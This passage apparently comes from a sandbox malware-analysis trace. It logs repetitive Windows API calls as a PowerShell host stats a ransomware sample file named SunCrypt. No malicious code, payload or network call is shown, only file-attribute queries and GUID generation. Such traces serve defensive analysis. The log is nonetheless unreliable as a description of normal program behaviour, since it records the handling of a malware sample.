lpFilePart=0x0) returned 0x3b [0104.182] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.182] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.185] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700128126) returned 1 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2b89b37b, Data2=0xd463, Data3=0x49fc, Data4=([0]=0x94, [1]=0xe8, [2]=0x9, [3]=0x90, 
[4]=0x3, [5]=0x94, [6]=0x9a, [7]=0xd))) returned 0x0 [0104.186] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.186] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701700275235) returned 1 [0104.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.186] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.188] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700458694) returned 1 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf284c10f, Data2=0x89b7, Data3=0x4d85, Data4=([0]=0x9c, [1]=0x9f, [2]=0xf2, [3]=0xc5, [4]=0xfb, [5]=0x36, [6]=0x86, [7]=0x23))) returned 0x0 [0104.189] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.190] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701700626335) returned 1 [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.192] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700894174) returned 1 [0104.192] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] EtwEventActivityIdControl () returned 0x0 [0104.193] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbf2ae368, Data2=0xa8e1, Data3=0x4105, Data4=([0]=0x8e, [1]=0xb1, [2]=0xf6, [3]=0x5b, [4]=0xc6, [5]=0x1a, [6]=0xc5, [7]=0x20))) returned 0x0 [0104.193] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.194] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701018630) returned 1 [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
lpFilePart=0x0) returned 0x3a [0104.194] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.194] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.194] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.195] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701183492) returned 1 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.195] EtwEventActivityIdControl () returned 0x0 [0104.196] EtwEventActivityIdControl () returned 0x0 [0104.196] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfe51d7cc, Data2=0xc7a5, Data3=0x4abf, Data4=([0]=0x91, [1]=0x18, [2]=0xdd, [3]=0x3e, [4]=0xa0, [5]=0xf9, [6]=0xbc, [7]=0x60))) returned 0x0 [0104.196] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.196] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701302730) returned 1 [0104.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.197] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.198] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701453941) returned 1 [0104.198] 
EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] EtwEventActivityIdControl () returned 0x0 [0104.198] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1ffe71f3, Data2=0x9963, Data3=0x46ec, Data4=([0]=0xa6, [1]=0x46, [2]=0x82, [3]=0xae, [4]=0x6f, [5]=0x33, [6]=0x2e, [7]=0xf6))) returned 0x0 [0104.199] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.199] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701584424) returned 1 [0104.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.199] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.199] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.200] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.200] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.200] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.200] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.202] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701701840113) returned 1 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] EtwEventActivityIdControl () returned 0x0 [0104.202] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb38ab03e, Data2=0xa8e, Data3=0x428b, Data4=([0]=0x83, [1]=0x81, [2]=0x33, [3]=0x87, [4]=0x7d, [5]=0x38, [6]=0xd, [7]=0x80))) returned 0x0 [0104.203] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.203] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701701982584) returned 1 [0104.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.203] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.203] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.206] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701702222377) returned 1 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.206] EtwEventActivityIdControl () returned 0x0 [0104.212] EtwEventActivityIdControl () returned 0x0 [0104.212] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xa9cb5d96, Data2=0x4d92, Data3=0x42c9, Data4=([0]=0xaa, [1]=0x25, [2]=0x67, [3]=0x18, [4]=0x8, [5]=0x2b, [6]=0x3e, [7]=0x8a))) returned 0x0 [0104.213] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.213] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701702965478) returned 1 [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.213] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.213] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.213] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.214] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.218] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701703443061) returned 1 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] EtwEventActivityIdControl () returned 0x0 [0104.218] CoCreateGuid (in: 
pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x5535cf67, Data2=0x72d9, Data3=0x4d0d, Data4=([0]=0xa2, [1]=0x84, [2]=0xa8, [3]=0x98, [4]=0xa3, [5]=0x54, [6]=0x4a, [7]=0xa3))) returned 0x0 [0104.219] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.219] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701703565095) returned 1 [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.219] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.219] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.220] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.221] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701703731784) returned 1 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] EtwEventActivityIdControl () returned 0x0 [0104.221] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc7ba67d0, Data2=0x9c8a, Data3=0x4f72, Data4=([0]=0x87, [1]=0x73, [2]=0xa4, [3]=0xa2, [4]=0x85, [5]=0xce, [6]=0xb7, [7]=0x49))) returned 0x0 [0104.222] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.222] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701703847454) returned 1 [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.222] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.222] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.222] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 